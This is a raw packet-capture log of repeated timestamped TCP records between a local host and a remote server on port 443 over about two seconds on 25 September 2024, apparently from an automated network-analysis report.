                                                Sep 25, 2024 18:50:14.398181915 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:14.398226023 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:14.398237944 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:14.398243904 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:14.398281097 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:14.398298979 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:14.398616076 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:14.398637056 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:14.398674011 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:14.398680925 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:14.398713112 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:14.398719072 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:14.398735046 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:14.398742914 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:14.398756981 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:14.398772955 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:14.398814917 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:14.449219942 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:14.449244976 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:14.449312925 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:14.449350119 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:14.449378967 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:14.449388981 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:14.449604988 CEST44349705207.241.227.240192.168.2.5
Sep 25, 2024 18:50:14.449625969 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.449682951 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:14.449692965 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.449733973 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:14.459343910 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.459367990 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.459476948 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:14.459490061 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.459528923 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:14.484258890 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.484283924 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.484435081 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:14.484468937 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.484510899 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:14.484523058 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.484539986 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.484597921 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:14.484606981 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.484652996 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:14.484730005 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.484745979 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.484797955 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:14.484805107 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.484849930 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:14.485270977 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.485301018 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.485330105 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:14.485337973 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.485363007 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:14.485388994 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:14.485743999 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.485760927 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.485827923 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:14.485836983 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.485876083 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:14.536036015 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.536060095 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.536115885 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:14.536153078 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.536175013 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:14.536228895 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:14.536299944 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.536315918 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.536366940 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:14.536376953 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.536411047 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:14.546916962 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.546977043 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.547000885 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:14.547032118 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.547051907 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:14.547069073 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:14.571280956 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.571300030 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.571379900 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:14.571408033 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.571465969 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:14.589514017 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.589540005 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.589627981 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:14.589653969 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.589838982 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:14.590651989 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.590672970 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.590722084 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:14.590738058 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.590760946 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:14.590783119 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:14.723072052 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.723102093 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.723263025 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:14.723300934 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.723339081 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.723350048 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:14.723361969 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.723373890 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.723392963 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:14.723437071 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:14.723993063 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.724008083 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.724072933 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:14.724083900 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.724121094 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:14.724370003 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.724385977 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.724440098 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:14.724447012 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.724478006 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:14.790039062 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.790064096 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.790131092 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:14.790150881 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.790179014 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:14.790201902 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:14.790743113 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.790765047 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.790803909 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:14.790812016 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.790841103 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:14.793571949 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:14.857027054 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.857044935 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.857135057 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:14.857160091 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.857208014 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:14.857752085 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.857768059 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.857820988 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:14.857836962 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.857877970 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:14.923695087 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.923712015 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.923955917 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:14.923978090 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.924025059 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:14.924916983 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.924932957 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.925002098 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:14.925018072 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.925055027 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:14.992363930 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.992392063 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.992558956 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:14.992578983 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.992616892 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:14.994087934 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.994107008 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.994168043 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:14.994179010 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:14.994210005 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:15.059132099 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:15.059153080 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:15.059242964 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:15.059262037 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:15.059329987 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:15.061443090 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:15.061465025 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:15.061532021 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:15.061546087 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:15.061587095 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:15.126013994 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:15.126038074 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:15.126183033 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:15.126215935 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:15.126252890 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:15.128190994 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:15.128212929 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:15.128274918 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:15.128292084 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:15.128328085 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:15.192914009 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:15.192939997 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:15.193011045 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:15.193034887 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:15.193052053 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:15.193068981 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:15.196489096 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:15.196511984 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:15.196572065 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:15.196578979 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:15.196626902 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:15.330461979 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:15.330486059 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:15.330564022 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:15.330573082 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:15.330599070 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:15.330621958 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:15.330626011 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:15.330667019 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:15.330674887 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:15.330709934 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:15.330940008 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:15.330955029 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:15.331011057 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:15.331020117 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:15.331065893 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:15.400794029 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:15.400813103 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:15.400942087 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:15.400964975 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:15.401004076 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:15.463430882 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:15.463455915 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:15.463670015 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:15.463697910 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:15.463749886 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:15.532557011 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:15.532582998 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:15.532824993 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:15.532847881 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:15.532898903 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:15.533039093 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:15.533061981 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:15.533121109 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:15.533128023 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:15.533155918 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:15.668196917 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:15.668221951 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:15.668404102 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:15.668416977 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:15.668524981 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:15.732534885 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:15.732568979 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:15.732793093 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:15.732816935 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:15.732868910 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:15.803291082 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:15.803316116 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:15.803417921 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:15.803417921 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:15.803436041 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:15.803481102 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:15.865596056 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:15.865622044 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:15.865895033 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:15.865923882 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:15.866130114 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:15.940232038 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:15.940267086 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:15.940462112 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:15.940500975 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:15.940670013 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:16.008774996 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:16.008800030 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:16.009114981 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:16.009145021 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:16.009283066 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:16.081476927 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:16.081502914 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:16.085525036 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:16.085546017 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:16.087872982 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:16.217839003 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:16.217865944 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:16.218296051 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:16.218316078 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:16.219316006 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:16.219414949 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:16.219438076 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:16.219540119 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:16.219547987 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:16.223912001 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:16.417543888 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:16.417583942 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:16.417629004 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:16.417665958 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:16.417824030 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:16.417824030 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:16.418325901 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:16.418349981 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:16.418426037 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:16.418426037 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:16.418435097 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:16.420526028 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:16.552423000 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:16.552459002 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:16.552525997 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:16.552575111 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:16.552973986 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:16.552973986 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:16.688764095 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:16.688802004 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:16.689055920 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:16.689078093 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:16.689207077 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
Sep 25, 2024 18:50:16.815397978 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:16.815426111 CEST | 443 | 49705 | 207.241.227.240 | 192.168.2.5
Sep 25, 2024 18:50:16.815557957 CEST | 49705 | 443 | 192.168.2.5 | 207.241.227.240
